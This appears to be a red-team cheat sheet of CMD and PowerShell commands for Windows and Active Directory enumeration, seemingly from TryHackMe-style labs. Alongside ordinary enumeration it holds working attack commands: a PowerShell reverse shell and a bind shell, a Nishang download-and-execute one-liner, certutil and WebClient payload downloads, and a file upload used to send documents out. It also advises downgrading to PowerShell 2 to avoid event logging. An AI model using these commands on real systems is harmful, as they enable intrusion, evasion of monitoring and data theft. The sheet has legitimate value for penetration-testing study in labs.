CMD & PowerShell

CMD

system

systeminfo

user – enumerate all local account

net user

user – enumerate all users in domain

net user /domain

user – details

net user michael_admin /domain

group – all groups in domain

net group /domain

group – details

net group "Tier 1 Admins" /domain

account – password policy

net accounts /domain

file transfer

certutil -urlcache -f http://10.10.10.5/exploit.exe exploit.exe

read file

type flag.txt

show and read alternate data streams

dir /R
more < flag.txt:root.txt:$DATA

PowerShell

downgrade powershell

Many defenders are unaware that several versions of PowerShell often exist on a host. If not uninstalled, they can still be used. Powershell event logging was introduced as a feature with Powershell 3.0 and forward. With that in mind, we can attempt to call Powershell version 2.0 or older. If successful, our actions from the shell will not be logged in Event Viewer. This is a great way for us to remain under the defenders' radar while still utilizing resources built into the hosts to our advantage.

 powershell.exe -version 2

from cmd to powershell

powershell -ep bypass

reverse shell (1)

Listener (On hacker machine)

nc -nvlp 4444

On target machine

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('11.22.33.44',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

reverse shell (2)

Source of ps1 scripts

sudo git clone https://github.com/samratashok/nishang /opt/nishang

listener (On hacker machine)
nc -nvlp 4444
On target machine**

powershell iex (New-Object Net.WebClient).DownloadString('http://11.22.33.44:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 11.22.33.44 -Port 4444

bind Shell

setup listener on windows box

powershell -c "$l = New-Object System.Net.Sockets.TcpListener('0.0.0.0',4444);$l.start();$client = $l.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();$l.Stop()"

on kali linux

nc -nv 11.22.33.44 4444

run application

Start-Process notepad.txt

search command

Get-command get-*ip*

list files

Get-Childitem -Path C:\

list hidden files

gci -force

file search

Get-Childitem -Path C:\ -Recurse -force -Include *.txt
Get-Childitem -Path C:\ -Recurse -force -ErrorAction SilentlyContinue -Include *interesting-file.txt*
Get-Childitem -Path C:\ -Recurse -force -ErrorAction SilentlyContinue -Filter *interesting-file.txt*

Get-ChildItem -Path C:\ -Include *.bak* -File -Recurse -ErrorAction SilentlyContinue

read file

more password.txt
type password.txt
cat password.txt
get-content .\password.txt

present data

get-process | out-gridview
get-hostfix | out-gridview

save into file

get-hotfix | out-file hotfix.txt

copy and move file

copy-item password.txt password_copy.txt
move-item password.txt password_copy.txt

download file

(New-Object System.Net.WebClient).DownloadFile("http://<IP>/shell.exe","C:/windows/temp/shell.exe")

download file, but not save

IEX (New-Object System.Net.WebClient).DownloadString('http://<IP>/hello.ps1')

upload file

**upload.php

<?php
$uploaddir = '/var/www/uploads/';

$uploadfile = $uploaddir . $_FILES['file']['name'];

move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)
?>

(New-Object System.Net.WebClient).UploadFile('http://<ip>/upload.php', 'important.docx')

search by content

Get-ChildItem -Path C:\ -Recurse -force -ErrorAction SilentlyContinue | Select-String -Pattern "connectionString" -ErrorAction SilentlyContinue | Select-Object -Unique Path
Get-ChildItem -Path C:\ -Recurse -force -ErrorAction SilentlyContinue | Select-String -Pattern "SQL01" -ErrorAction SilentlyContinue | Select-Object -Unique Path

show services

get-service
get-service | where-object -property status -eq running
get-service | where-object -property status -eq stopped
Get-WmiObject win32_service | ?{$_.State -like 'Running'} | select Name, DisplayName, PathName

current working directory

get-location

check if file exist

test-path c:/program files/interesting-files.txt

get list of users

get-localuser

get list of user with details

get-localuser | select *

get details of user

get-localuser -name Administrator | select *

list local groups

get-localgroup

get IP address

get-netipadresss

get all process

get-process

list scheduled tasks

get-scheduledtask

get owner of

get-acl c:

unzip

Expand-Archive -Path winpeas.zip -DestinationPath .

check .Net version

reg query "HKLM\SOFTWARE\Microsoft\Net Framework Setup\NDP"

file transfers

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://11.22.33.44:8000/winpeas.bat','C:\Windows\Temp\winpeas.bat')"
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://11.22.33.44:8000/powercat.ps1','C:\Windows\Temp\powercat.ps1')"

enumerate patches

get-hotfix
get-hotfix | format-list | findstr InstalledOn

Powershell on Active Directory Domain Controller

enumerate user

get-aduser -Filter *

get-aduser -Filter * -searchBase "CN=Users,DC=THMREDTEAM,DC=COM"
get-aduser -Filter * -searchBase "OU=THM,DC=THMREDTEAM,DC=COM"

get-aduser -Identity gordon.stevens -Server za.tryhackme.com -Properties *

get-aduser -Filter 'Name -like "*stevens"' -Server za.tryhackme.com | Format-Table Name,SamAccountName -A

enumerate groups

Get-ADGroup -Identity Administrators -Server za.tryhackme.com

Get-ADGroupMember -Identity Administrators -Server za.tryhackme.com

enumerate objects

looking for all AD objects that were changed after a specific date

$ChangeDate = New-Object DateTime(2022, 02, 28, 12, 00, 00)
Get-ADObject -Filter 'whenChanged -gt $ChangeDate' -includeDeletedObjects -Server za.tryhackme.com

enumerate domains

Get-ADDomain -Server za.tryhackme.com

powershell script

error – execution of scripts is disabled on this system

Set-ExecutionPolicy RemoteSigned

get domain

[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()

script → get users

$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()

$PDC = ($domainObj.PdcRoleOwner).Name

$searchStr = "LDAP://"
$searchStr += $PDC + "/"
$Name = "DC=$($domainObj.Name.Replace('.',',DC='))"
$searchStr += $Name
$searchStr

$seracher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$searchStr)
$objDomain = New-Object System.DirectoryServices.DirectoryEntry

$seracher.SearchRoot = $objDomain

$seracher.filter = "samAccountType=805306368"

$items = $seracher.FindAll()

Foreach($obj in $items) {
    Foreach($prop in $obj.Properties) {
        $prop.name # <- print only name
    }
    Write-Host "-------------------------"
}

script → get groups

$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()

$PDC = ($domainObj.PdcRoleOwner).Name

$searchStr = "LDAP://"
$searchStr += $PDC + "/"
$Name = "DC=$($domainObj.Name.Replace('.',',DC='))"
$searchStr += $Name
$searchStr

$seracher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$searchStr)
$objDomain = New-Object System.DirectoryServices.DirectoryEntry

$seracher.SearchRoot = $objDomain

$seracher.filter = "(objectClass=group)"

$items = $seracher.FindAll()

Foreach($obj in $items) {
    Foreach($prop in $obj.Properties) {
        $prop.name
        $prop.member
    }
    Write-Host "-------------------------"
}

script → get serverprincipalname

$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()

$PDC = ($domainObj.PdcRoleOwner).Name

$searchStr = "LDAP://"
$searchStr += $PDC + "/"
$Name = "DC=$($domainObj.Name.Replace('.',',DC='))"
$searchStr += $Name
$searchStr

$seracher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$searchStr)
$objDomain = New-Object System.DirectoryServices.DirectoryEntry

$seracher.SearchRoot = $objDomain

$seracher.filter = "serviceprincipalname=*http*"

$items = $seracher.FindAll()

Foreach($obj in $items) {
    Foreach($prop in $obj.Properties) {
        $prop
    }
    Write-Host "-------------------------"
}